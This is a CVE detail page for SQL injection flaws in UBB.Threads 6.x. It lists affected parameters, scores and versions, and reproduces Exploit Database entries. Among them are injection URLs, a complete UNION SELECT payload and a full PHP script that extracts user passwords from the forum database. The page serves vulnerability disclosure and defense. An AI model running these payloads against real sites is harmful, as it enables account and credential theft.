CVE-2005-2058 : Detail

CVE-2005-2058

0.58%V4
Network
2005-06-28
02h00 +00:00
2016-10-17
11h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple SQL injection vulnerabilities in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to execute arbitrary SQL commands via the Number parameter to (1) download.php, (2) modifypost.php, (3) mailthread.php, or (4) notifymod.php, (5) month or (6) year parameter to calendar.php, (7) message parameter to viewmessage.php, (8) main parameter to addfav.php, or (9) posted parameter to grabnext.php.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 25901

Publication date : 2005-06-23 22h00 +00:00
Author : GulfTech Security
EDB Verified : Yes

source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat
Exploit Database EDB-ID : 25898

Publication date : 2005-06-23 22h00 +00:00
Author : GulfTech Security
EDB Verified : Yes

source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/ubbt/calendar.php?Cat=7&month=6&year=2005[SQL] http://www.example.com/ubbt/calendar.php?Cat=&month=7[SQL]&year=2005
Exploit Database EDB-ID : 25897

Publication date : 2005-06-23 22h00 +00:00
Author : GulfTech Security
EDB Verified : Yes

source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/ubbt/download.php?Number=42227[SQL]
Exploit Database EDB-ID : 25903

Publication date : 2005-06-23 22h00 +00:00
Author : GulfTech Security
EDB Verified : Yes

source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]
Exploit Database EDB-ID : 25899

Publication date : 2005-06-23 22h00 +00:00
Author : GulfTech Security
EDB Verified : Yes

source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/ubbt/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post
Exploit Database EDB-ID : 25902

Publication date : 2005-06-23 22h00 +00:00
Author : GulfTech Security
EDB Verified : Yes

source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded
Exploit Database EDB-ID : 25900

Publication date : 2005-06-23 22h00 +00:00
Author : GulfTech Security
EDB Verified : Yes

source: https://www.securityfocus.com/bid/14052/info UBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received
Exploit Database EDB-ID : 1069

Publication date : 2005-06-24 22h00 +00:00
Author : mh_p0rtal
EDB Verified : Yes

<?php ############################################################################# # T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m ############################################################################# # Vulnerable: UBBCentral SQL Injection # # Exploit By : MH_p0rtal # # Discovered By: James Bercegay ############################################################################# # Gr33tz To ==> Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke # # And Iranian Hacking & Security Teams : # IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team , # Crouz Security Team & Simorgh-ev Security Team ############################################################################# # ___________Config : # please replace your address : $url = "http:///www.example.com"; # please replace your dir address : $dirs = "/dir/to/ubbt/"; # __________End Config ############################################################################# $aa = strlen ( $dirs ); $ab = $aa - 1; $ac = 0; if (( $dirs[$ab] == "/" ) && ( $dirs[$ac] == "/" )) { $merg = $dirs.mailthread.php; $fc = fsockopen("$url", 80, $errno, $errstr, 30); if (!$fc) { echo "Can't Connect\n"; } else { $mh = "GET $merg?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat HTTP/1.1\r\n"; $mh .= "Host: $url\r\n"; $mh .= "Connection: Close\r\n\r\n"; fwrite($fc, $mh); while (!feof($fc)) { echo fgets($fc, 1024); } fclose($fc); } } else { echo " Your pattern doesn't equal with Exploit directory pattern "; } ?> # milw0rm.com [2005-06-25]

Products Mentioned

Configuraton 0

Ubbcentral>>Ubb.threads >> Version 6.0

    Ubbcentral>>Ubb.threads >> Version 6.0.1

    Ubbcentral>>Ubb.threads >> Version 6.0.2

    Ubbcentral>>Ubb.threads >> Version 6.0.3

    Ubbcentral>>Ubb.threads >> Version 6.1

      Ubbcentral>>Ubb.threads >> Version 6.1.1

      Ubbcentral>>Ubb.threads >> Version 6.2

        Ubbcentral>>Ubb.threads >> Version 6.2.1

        Ubbcentral>>Ubb.threads >> Version 6.2.2

        Ubbcentral>>Ubb.threads >> Version 6.2.3

        Ubbcentral>>Ubb.threads >> Version 6.3

          Ubbcentral>>Ubb.threads >> Version 6.3.1

          Ubbcentral>>Ubb.threads >> Version 6.4

            Ubbcentral>>Ubb.threads >> Version 6.4.1

            Ubbcentral>>Ubb.threads >> Version 6.4.2

            Ubbcentral>>Ubb.threads >> Version 6.4.3

            Ubbcentral>>Ubb.threads >> Version 6.4.4

            Ubbcentral>>Ubb.threads >> Version 6.5

              Ubbcentral>>Ubb.threads >> Version 6.5.1

              Ubbcentral>>Ubb.threads >> Version 6.5.1.1

              References

              http://marc.info/?l=bugtraq&m=111963737202040&w=2
              Tags : mailing-list, x_refsource_BUGTRAQ